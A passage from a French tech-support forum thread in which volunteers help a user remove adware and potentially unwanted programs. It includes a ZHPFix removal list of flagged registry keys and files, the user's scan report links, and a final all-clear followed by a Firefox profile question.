R0 - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.globasearch.com/ =>PUP.Optional.IMBooster
IE Restricted Site Good: webcompanion.com =>PUP.Optional.LavasoftWebCompanion
HKU\S-1-5-21-1333819402-4268670352-963233347-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com =>PUP.Optional.LavasoftWebCompanion
HKCU\Software\Lavasoft\Web Companion =>PUP.Optional.LavasoftWebCompanion
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com =>PUP.Optional.LavasoftWebCompanion
HKLM\SOFTWARE\Lavasoft\Web Companion =>PUP.Optional.LavasoftWebCompanion
O43 - CFD: 27/08/2013 - [] D -- C:\ProgramData\BoxUpdChk =>PUP.Optional.Boxore
O45 - LFCP:[MD5.5DF9C441AB0337276DD238DECBC2FA5E] 28/01/2019 A -- C:\Windows\Prefetch\QUOTEEX.EXE-6844FE42.pf =>PUP.Optional.Graftor
O69 - SBI: prefs.js [AMINE - 3gaizwt5.default-1548895366067] user_pref("browser.startup.homepage", "http://www.globasearch.com/?serie=225&b=2&installkey=QjGO0z0dNXcmdl8Abm4x"); =>PUP.Optional.IMBooster
O69 - SBI: prefs.js [AMINE - 3gaizwt5.default-1548895366067] user_pref("browser.newtab.url", "http://www.globasearch.com/?serie=225&b=2&installkey=QjGO0z0dNXcmdl8Abm4x&newtab"); =>PUP.Optional.IMBooster
O69 - SBI: SearchScopes [HKCU]{B53717E6-1A69-4880-A01B-F8D69FE26444} [DefaultScope] - () - http://www.globasearch.com/ =>PUP.Optional.IMBooster
O69 - SBI: SearchScopes [HKLM]{0633EE93-D776-472f-A0FF-E1416B8B2E3A} [DefaultScope] - () - http://www.globasearch.com/ =>PUP.Optional.IMBooster
HKLM\SOFTWARE\Microsoft\Tracing\boxore_RASAPI32 =>PUP.Optional.Boxore
HKLM\SOFTWARE\Microsoft\Tracing\boxore_RASDLG =>PUP.Optional.Boxore
HKLM\SOFTWARE\Microsoft\Tracing\boxore_RASMANCS =>PUP.Optional.Boxore
C:\ProgramData\BoxUpdChk =>PUP.Optional.Boxore
C:\Windows\Prefetch\QUOTEEX.EXE-6844FE42.pf =>PUP.Optional.Graftor
HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{B53717E6-1A69-4880-A01B-F8D69FE26444} =>PUP.Optional.IMBooster
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} =>PUP.Optional.IMBooster
HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\boxore_RASAPI32 =>PUP.Optional.Boxore
HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\boxore_RASDLG =>PUP.Optional.Boxore
HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\boxore_RASMANCS =>PUP.Optional.Boxore
HKU\S-1-5-21-1333819402-4268670352-963233347-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com =>PUP.Optional.LavasoftWebCompanion
HKCU\Software\Lavasoft\Web Companion =>PUP.Optional.LavasoftWebCompanion
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com =>PUP.Optional.LavasoftWebCompanion
HKLM\SOFTWARE\Lavasoft\Web Companion =>PUP.Optional.LavasoftWebCompanion
O4 - HKCU\..\Run: [hEeFx6jXpx.exe] . (. - .) -- C:\Program Files\Google\TGUQ8I3LQ51O\hEeFx6jXpx.exe (.Not File.) =>.SUP.Orphan
O4 - HKCU\..\Run: [Web Companion] . (. - .) -- C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe (.Not File.) =>.SUP.Orphan
O4 - HKCU\..\Run: [20000] . (. - .) -- C:\Users\AMINE\AppData\Roaming\l0voufwmrvk\rbjnpu1fxpo.exe (.Not File.) =>.SUP.Orphan
O4 - HKCU\..\Run: [33599] . (. - .) -- C:\Users\AMINE\AppData\Roaming\vyujgpq5ij1\yd4osjpwigp.exe (.Not File.) =>.SUP.Orphan
O4 - HKUS\S-1-5-21-1333819402-4268670352-963233347-1001\..\Run: [hEeFx6jXpx.exe] . (. - .) -- C:\Program Files\Google\TGUQ8I3LQ51O\hEeFx6jXpx.exe (.Not File.) =>.SUP.Orphan
O4 - HKUS\S-1-5-21-1333819402-4268670352-963233347-1001\..\Run: [Web Companion] . (. - .) -- C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe (.Not File.) =>.SUP.Orphan
O4 - HKUS\S-1-5-21-1333819402-4268670352-963233347-1001\..\Run: [20000] . (. - .) -- C:\Users\AMINE\AppData\Roaming\l0voufwmrvk\rbjnpu1fxpo.exe (.Not File.) =>.SUP.Orphan
O4 - HKUS\S-1-5-21-1333819402-4268670352-963233347-1001\..\Run: [33599] . (. - .) -- C:\Users\AMINE\AppData\Roaming\vyujgpq5ij1\yd4osjpwigp.exe (.Not File.) =>.SUP.Orphan
HKCU\SOFTWARE\Softonic =>.SUP.Softonic
HKU\S-1-5-21-1333819402-4268670352-963233347-1001\SOFTWARE\Softonic =>.SUP.Softonic
O87 - FAEL: "{C7F1B303-9A0C-4F0E-8FD1-65FB47305C47}" [In-None-P6-TRUE] .(...) -- C:\Program Files\Microsoft\Skype for Desktop\Skype.exe (.not file.) =>.SUP.Orphan
O87 - FAEL: "{EE7F7FBD-0BB8-4A4F-8B69-1471FCAC32B9}" [In-None-P17-TRUE] .(...) -- C:\Program Files\Microsoft\Skype for Desktop\Skype.exe (.not file.) =>.SUP.Orphan
[MD5.B5B294D6E8CF1D6C89EC5F6CC580C8CE] [WIS][2017/04/05 03:14:24] (.Adobe Systems, Incorporated.) -- C:\Windows\Installer\10a8b3b.msp [92508160] =>.SUP.Obsolete.Adobe
[MD5.EA48CEE0330DB754D43DA7B072FD9C33] [WIS][2017/11/29 11:42:41] (.Adobe Systems, Incorporated.) -- C:\Windows\Installer\1c7ea0.msp [102903808] =>.SUP.Obsolete.Adobe
HKLM\SOFTWARE\Microsoft\Tracing\ReimageRepair (1)_RASAPI32 =>.SUP.ReimageRepair
HKLM\SOFTWARE\Microsoft\Tracing\ReimageRepair (1)_RASMANCS =>.SUP.ReimageRepair
C:\Windows\Installer\10a8b3b.msp =>.SUP.Obsolete.Adobe
C:\Windows\Installer\1c7ea0.msp =>.SUP.Obsolete.Adobe
HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\ReimageRepair (1)_RASAPI32 =>.SUP.ReimageRepair
HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\ReimageRepair (1)_RASMANCS =>.SUP.ReimageRepair
C:\Users\AMINE\AppData\Local\Google\Chrome\User Data\Default\File System\000 =>.SUP.Temporary.Chrome
C:\Users\AMINE\AppData\Local\Google\Chrome\User Data\Default\File System\001 =>.SUP.Temporary.Chrome
Fin
Redémarre le pc si on te le demande !
Héberge le rapport ZHPFix, comment se comporte ton pc ?
On continue : https://www.malekal.com/tutoriel-adwcleaner/
Refais une nouvelle analyse ZHPDiag.
A te relire
Refais une nouvelle analyse ZHPDiag.
A te relire
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
31 janv. 2019 à 15:51
31 janv. 2019 à 15:51
j'arrive pas à telecharger ZHPFix ( il n'est pas dans le package ZHPDiag) , de plus j'ai du créer un compte sur le site de nicolas coolman pour pouvoir télécharger le module ZHPFix , mais celui ci rame et les liens de téléchargement d'exe semblent inopérants
aurais tu un autre lien pour le ZHPFix ? thanx
aurais tu un autre lien pour le ZHPFix ? thanx
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
31 janv. 2019 à 16:16
31 janv. 2019 à 16:16
ça y est j'ai pu le télécharger , voici le rapport ZHPFix :
_ https://pjjoint.malekal.com/files.php?id=20190131_e8u8b7v10w8
_ https://pjjoint.malekal.com/files.php?id=20190131_e8u8b7v10w8
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
31 janv. 2019 à 16:17
31 janv. 2019 à 16:17
je m'occupe de adwcleaner et te reviens
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
31 janv. 2019 à 17:52
31 janv. 2019 à 17:52
adwcleaner a détecté 4 menaces , j'ai tout supprimé (nettoyer et réparer)
voici le rapport https://pjjoint.malekal.com/files.php?id=20190131_v15h12s6g10g13
le rapport ZHPDiag semble positif , 0 menace détectée !
https://pjjoint.malekal.com/files.php?id=20190131_b9m9m7q9i14
voici le rapport https://pjjoint.malekal.com/files.php?id=20190131_v15h12s6g10g13
le rapport ZHPDiag semble positif , 0 menace détectée !
https://pjjoint.malekal.com/files.php?id=20190131_b9m9m7q9i14
Re,
Ton pc est propre !
Tu peux supprimer tout les outils utilisés à part MalwareBytes pour analyser ton pc de temps à autre.
Tu peux mettre le sujet en résolu : https://www.commentcamarche.net/infos/25917-marquer-un-fil-de-discussion-comme-etant-resolu/
A bientôt
Ton pc est propre !
Tu peux supprimer tout les outils utilisés à part MalwareBytes pour analyser ton pc de temps à autre.
Tu peux mettre le sujet en résolu : https://www.commentcamarche.net/infos/25917-marquer-un-fil-de-discussion-comme-etant-resolu/
A bientôt
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
31 janv. 2019 à 22:30
31 janv. 2019 à 22:30
Super , merci Foufou , merci pour ton temps et ta patience !!!!!
moujik23
Messages postés
36
Date d'inscription
vendredi 27 avril 2018
Statut
Membre
Dernière intervention
20 mars 2019
31 janv. 2019 à 23:00
31 janv. 2019 à 23:00
au fait je viens de réinstaller firefox que j'avais désinstallé avec revo , mais là y a un truc de cassé j'ai l'impression : " Le profil Firefox ne peut être chargé. Il est peut-être manquant ou inaccessible."
est ce que tu penses que c'est un problème de version ( j'ai bien pris soin de télécharger une version 32 bits) ou penses tu que les différents nettoyages ont bloqué l'install de firefox ?
est ce que tu penses que c'est un problème de version ( j'ai bien pris soin de télécharger une version 32 bits) ou penses tu que les différents nettoyages ont bloqué l'install de firefox ?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 651
1 févr. 2019 à 10:34
1 févr. 2019 à 10:34
